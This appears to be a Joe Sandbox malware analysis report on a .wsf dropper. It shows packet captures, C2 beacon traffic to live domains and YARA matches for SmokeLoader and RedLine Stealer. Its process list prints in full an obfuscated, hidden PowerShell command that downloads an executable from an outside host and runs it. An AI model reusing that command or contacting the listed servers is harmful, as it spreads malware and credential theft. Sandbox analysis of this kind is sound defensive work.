                                                                                                                              Data Ascii: ;AujhAutu=?QuCjYeVYEtVP>YYE}u7ujYVj5AAuhAPYUQeVEPuuUu9E
                                                                                                                              Oct 4, 2024 16:35:38.057327986 CEST448INData Raw: 00 83 7d 10 00 75 28 89 1d 70 d7 41 00 6a 08 e8 96 04 00 00 59 ff 75 08 e8 fc fd ff ff 33 db 43 83 7d 10 00 74 08 6a 08 e8 7d 04 00 00 59 c3 e8 8e 10 00 00 c3 8b ff 55 8b ec 6a 00 6a 00 ff 75 08 e8 c3 fe ff ff 83 c4 0c 5d c3 8b ff 55 8b ec 6a 00
                                                                                                                              Data Ascii: }u(pAjYu3C}tj}YUjju]Ujju]jjjjjjVV8Vp8V&VU8V@8V(6V4V4h@&$A^U=|Au1ua/h'Y
                                                                                                                              Oct 4, 2024 16:35:38.148142099 CEST1236INData Raw: 01 fc ff ff 59 e8 77 38 00 00 85 c0 7d 08 6a 09 e8 f0 fb ff ff 59 53 e8 a8 fc ff ff 59 3b c6 74 07 50 e8 de fb ff ff 59 e8 0e 38 00 00 84 5d c4 74 06 0f b7 4d c8 eb 03 6a 0a 59 51 50 56 68 00 00 40 00 e8 25 78 01 00 89 45 e0 39 75 e4 75 06 50 e8
                                                                                                                              Data Ascii: Yw8}jYSY;tPY8]tMjYQPVh@%xE9uuPF}5EMPQD3YYeEE}uP"EE3@eEPW=yU(AAA|A5xA=tAfAf
                                                                                                                              Oct 4, 2024 16:35:38.148869991 CEST116INData Raw: 5d 0c 8b 53 08 8b 5b 04 8b 4d fc 03 4d f4 89 5a 04 8b 55 0c 8b 5a 04 8b 52 08 89 53 08 89 4d fc 8b d1 c1 fa 04 4a 83 fa 3f 76 03 6a 3f 5a 8b 5d f8 83 e3 01 89 5d f4 0f 85 8f 00 00 00 2b 75 f8 8b 5d f8 c1 fb 04 6a 3f 89 75 0c 4b 5e 3b de 76 02 8b
                                                                                                                              Data Ascii: ]S[MMZUZRSMJ?vj?Z]]+u]j?uK^;vMJM;v;t^Mq;qu;
                                                                                                                              Oct 4, 2024 16:35:38.219177008 CEST1236INData Raw: be 00 00 00 80 83 fb 20 73 17 8b cb d3 ee f7 d6 21 74 b8 44 fe 4c 03 04 75 21 8b 4d 08 21 31 eb 1a 8d 4b e0 d3 ee f7 d6 21 b4 b8 c4 00 00 00 fe 4c 03 04 75 06 8b 4d 08 21 71 04 8b 4d 0c 8b 71 08 8b 49 04 89 4e 04 8b 4d 0c 8b 71 04 8b 49 08 89 4e
                                                                                                                              Data Ascii: s!tDLu!M!1K!LuM!qMqINMqINu]}u;MYN^qNqN;Nu`LML s%}uMDD)}uJMYJED0
                                                                                                                              Oct 4, 2024 16:35:38.219194889 CEST1236INData Raw: 4d 13 fe c1 88 4c 07 04 83 ff 20 73 1c 80 7d 13 00 75 0e 8b cf bb 00 00 00 80 d3 eb 8b 4d 08 09 19 8d 44 90 44 8b cf eb 20 80 7d 13 00 75 10 8d 4f e0 bb 00 00 00 80 d3 eb 8b 4d 08 09 59 04 8d 84 90 c4 00 00 00 8d 4f e0 ba 00 00 00 80 d3 ea 09 10
                                                                                                                              Data Ascii: ML s}uMDD }uOMYOUMD2LUFBD2<38/])uNK\3uN]K?vj?^EuN?vj?^O;OuB st!\Du#M!NL
                                                                                                                              Oct 4, 2024 16:35:38.219207048 CEST1236INData Raw: fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 18 53 8b 5d 0c 56 8b 73 08 33 35 08 c0 41 00 57 8b 06 c6 45 ff 00 c7 45 f4 01 00 00 00 8d
                                                                                                                              Data Ascii: EEdMdY__^[]QUS]Vs35AWEE{tN38GNF387E@fMUS[EMt_I[LDEEt<4E|@GEu}t$tN38NV3
                                                                                                                              Oct 4, 2024 16:35:38.219440937 CEST672INData Raw: f7 5d fc 80 7d f8 00 74 07 8b 45 f4 83 60 70 fd 8b 45 fc eb 18 8b 45 10 85 c0 74 02 89 30 80 7d f8 00 74 07 8b 45 f4 83 60 70 fd 33 c0 5b 5f 5e c9 c3 8b ff 55 8b ec 33 c0 50 ff 75 10 ff 75 0c ff 75 08 39 05 18 dc 41 00 75 07 68 b8 c8 41 00 eb 01
                                                                                                                              Data Ascii: ]}tE`pEEt0}tE`p3[_^U3Puuu9AuhAP]-t"ttHt3VWh3FWP/3~~~~AF+@Ou@Nu_^U
                                                                                                                              Oct 4, 2024 16:35:38.281721115 CEST1236INData Raw: 83 7f 6c 00 74 17 8b 77 68 85 f6 75 08 6a 20 e8 8d e5 ff ff 59 8b c6 e8 82 f8 ff ff c3 6a 0d e8 3c ed ff ff 59 83 65 fc 00 8b 77 68 89 75 e4 3b 35 d0 c6 41 00 74 36 85 f6 74 1a 56 ff 15 fc 90 41 00 85 c0 75 0f 81 fe a8 c2 41 00 74 07 56 e8 f4 e2
                                                                                                                              Data Ascii: ltwhuj Yj<Yewhu;5At6tVAuAtVYAGh5AuVAEujYUS3SMAuAA8]tEMap<uAAuE@A8
                                                                                                                              Oct 4, 2024 16:35:38.282030106 CEST80INData Raw: 74 17 39 18 75 13 50 e8 68 de ff ff ff b6 bc 00 00 00 e8 33 32 00 00 59 59 8b 86 b4 00 00 00 3b c3 74 17 39 18 75 13 50 e8 47 de ff ff ff b6 bc 00 00 00 e8 cd 31 00 00 59 59 ff b6 b0 00 00 00 e8 2f de ff ff ff b6 bc 00 00 00 e8 24 de ff ff
                                                                                                                              Data Ascii: t9uPh32YY;t9uPG1YY/$


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.449737193.46.217.78802580C:\Windows\explorer.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 4, 2024 16:36:19.271287918 CEST290OUTPOST /index.php HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Accept: */*
                                                                                                                              Referer: http://ntswbucbclbamtp.net/
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                              Content-Length: 131
                                                                                                                              Host: unicexpertmagazine.pw
                                                                                                                              Oct 4, 2024 16:36:19.271287918 CEST131OUTData Raw: a1 5f 0f 5a 8e 4a 5e ce c1 4b d7 b6 f9 c8 2a 49 5d 32 cf 5f 60 cb 45 25 a9 52 c9 69 70 89 75 52 c9 56 da f9 3a a0 7a 39 59 b0 cd 0f b5 45 12 33 db 73 6b 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 86 22 71 de
                                                                                                                              Data Ascii: _ZJ^K*I]2_`E%RipuRV:z9YE3sk2m-^JrC)"quI-VB>P|J~'#liF
                                                                                                                              Oct 4, 2024 16:36:29.436254025 CEST602INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Fri, 04 Oct 2024 14:36:29 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                                                              Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.449747188.40.141.211802580C:\Windows\explorer.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 4, 2024 16:36:29.781622887 CEST289OUTPOST /index.php HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Accept: */*
                                                                                                                              Referer: http://rbjmxbcxvhys.net/
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                              Content-Length: 154
                                                                                                                              Host: ceoconstractionstore.pl
                                                                                                                              Oct 4, 2024 16:36:29.781644106 CEST154OUTData Raw: a1 5f 0f 5a 8e 4a 5e ce c1 4b d7 b6 f9 c8 2a 49 5d 32 cf 5f 60 cb 45 25 a9 52 c9 69 70 89 75 52 c9 56 da f9 3a a0 7a 39 59 b0 cd 0f b5 45 12 33 db 73 6b 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be ef 54 2b c0
                                                                                                                              Data Ascii: _ZJ^K*I]2_`E%RipuRV:z9YE3sk2m-^JrC)T+w]']{Y5;s<1BU5}noUPq;`s`
                                                                                                                              Oct 4, 2024 16:36:30.516432047 CEST151INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Content-Length: 7
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Date: Fri, 04 Oct 2024 14:36:30 GMT
                                                                                                                              Data Raw: 03 00 00 00 7d 4f d6
                                                                                                                              Data Ascii: }O
                                                                                                                              Oct 4, 2024 16:36:30.523267984 CEST292OUTPOST /index.php HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Accept: */*
                                                                                                                              Referer: http://cyofcjcswoxlynm.com/
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                              Content-Length: 121
                                                                                                                              Host: ceoconstractionstore.pl
                                                                                                                              Oct 4, 2024 16:36:30.523313046 CEST121OUTData Raw: a1 5f 0f 5a 8e 4a 5e ce c1 4b d7 b6 f9 c8 2a 49 5d 32 cf 5f 60 cb 45 25 a9 52 c9 69 70 89 75 52 c9 56 da f9 3a a0 7a 39 59 b0 cd 0f b5 45 12 33 db 73 6b 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 1b 1d bc ca bf 4a 73 43 29 be a8 0d 2e b4
                                                                                                                              Data Ascii: _ZJ^K*I]2_`E%RipuRV:z9YE3sk2m-^JsC).jr<<Ct)U~5rMk
                                                                                                                              Oct 4, 2024 16:36:30.849364996 CEST144INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Content-Length: 0
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Date: Fri, 04 Oct 2024 14:36:30 GMT
                                                                                                                              Oct 4, 2024 16:36:47.547493935 CEST293OUTPOST /index.php HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Accept: */*
                                                                                                                              Referer: http://nxrvulqitgtfsjfu.com/
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                              Content-Length: 249
                                                                                                                              Host: ceoconstractionstore.pl
                                                                                                                              Oct 4, 2024 16:36:47.547528982 CEST249OUTData Raw: a1 5f 0f 5a 8e 4a 5e ce c1 4b d7 b6 f9 c8 2a 49 5d 32 cf 5f 60 cb 45 25 a9 52 c9 69 70 89 75 52 c9 56 da f9 3a a0 7a 39 59 b0 cd 0f b5 45 12 33 db 73 6b 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 8a 12 65 b5
                                                                                                                              Data Ascii: _ZJ^K*I]2_`E%RipuRV:z9YE3sk2m-^JrC)e/EF9k,)Tnz%ka&^hpoqS_EFfu.Imu6hyz))[^pw|zB!kva})+tc5/g}tuuaqy/C^
                                                                                                                              Oct 4, 2024 16:36:47.878665924 CEST151INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Content-Length: 7
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Date: Fri, 04 Oct 2024 14:36:47 GMT
                                                                                                                              Data Raw: 03 00 00 00 7d 4f d6
                                                                                                                              Data Ascii: }O
                                                                                                                              Oct 4, 2024 16:36:47.910543919 CEST290OUTPOST /index.php HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Accept: */*
                                                                                                                              Referer: http://vjkcaufqdqecw.com/
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                              Content-Length: 170
                                                                                                                              Host: ceoconstractionstore.pl
                                                                                                                              Oct 4, 2024 16:36:47.910578012 CEST170OUTData Raw: a1 5f 0f 5a 8e 4a 5e ce c1 4b d7 b6 f9 c8 2a 49 5d 32 cf 5f 60 cb 45 25 a9 52 c9 69 70 89 75 52 c9 56 da f9 3a a0 7a 39 59 b0 cd 0f b5 45 12 33 db 73 6b 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 1b 1d bc ca bf 4a 73 43 29 be e0 53 33 c4
                                                                                                                              Data Ascii: _ZJ^K*I]2_`E%RipuRV:z9YE3sk2m-^JsC)S3]%. QG5'e675:%Yggc)jSzZ-?[v8c9
                                                                                                                              Oct 4, 2024 16:36:48.243761063 CEST144INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Content-Length: 0
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Date: Fri, 04 Oct 2024 14:36:48 GMT


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.449842193.46.217.78802580C:\Windows\explorer.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 4, 2024 16:36:46.489733934 CEST291OUTPOST /index.php HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Accept: */*
                                                                                                                              Referer: http://gqhcklmysxvvdkln.com/
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                              Content-Length: 151
                                                                                                                              Host: unicexpertmagazine.pw
                                                                                                                              Oct 4, 2024 16:36:46.489761114 CEST151OUTData Raw: a1 5f 0f 5a 8e 4a 5e ce c1 4b d7 b6 f9 c8 2a 49 5d 32 cf 5f 60 cb 45 25 a9 52 c9 69 70 89 75 52 c9 56 da f9 3a a0 7a 39 59 b0 cd 0f b5 45 12 33 db 73 6b 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e3 0f 3b 9f
                                                                                                                              Data Ascii: _ZJ^K*I]2_`E%RipuRV:z9YE3sk2m-^JrC);k[PVs\d./EEvAW~?>hb&Q'
                                                                                                                              Oct 4, 2024 16:36:47.544548988 CEST602INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Fri, 04 Oct 2024 14:36:47 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                                                              Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0


                                                                                                                              Click to jump to process

                                                                                                                              Click to jump to process

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Click to jump to process

                                                                                                                              Target ID:0
                                                                                                                              Start time:10:35:31
                                                                                                                              Start date:04/10/2024
                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\UkHkCa3IYV.wsf"
                                                                                                                              Imagebase:0x7ff6a4750000
                                                                                                                              File size:170'496 bytes
                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:1
                                                                                                                              Start time:10:35:31
                                                                                                                              Start date:04/10/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
                                                                                                                              Imagebase:0x7ff7d2400000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:2
                                                                                                                              Start time:10:35:31
                                                                                                                              Start date:04/10/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:3
                                                                                                                              Start time:10:35:32
                                                                                                                              Start date:04/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:5
                                                                                                                              Start time:10:35:48
                                                                                                                              Start date:04/10/2024
                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\oBuf.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\oBuf.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:222'720 bytes
                                                                                                                              MD5 hash:31059E7394B880F017E83804D9B716AB
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1994744005.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1994744005.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1994821763.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1994821763.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1994949567.000000000078E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.1994716777.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 88%, ReversingLabs
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:8
                                                                                                                              Start time:10:35:59
                                                                                                                              Start date:04/10/2024
                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                                                              Imagebase:0x7ff72b770000
                                                                                                                              File size:5'141'208 bytes
                                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Target ID:9
                                                                                                                              Start time:10:36:19
                                                                                                                              Start date:04/10/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\fbhbvci
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\fbhbvci
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:222'720 bytes
                                                                                                                              MD5 hash:31059E7394B880F017E83804D9B716AB
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.2270864226.000000000082D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2270678080.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2270678080.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000002.2270658140.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2270739394.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2270739394.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 88%, ReversingLabs
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Reset < >
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.1937195965.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b890000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4942408b6b913c629bf7ab27e75949e04648a7700be6f97819f5e5167400597e
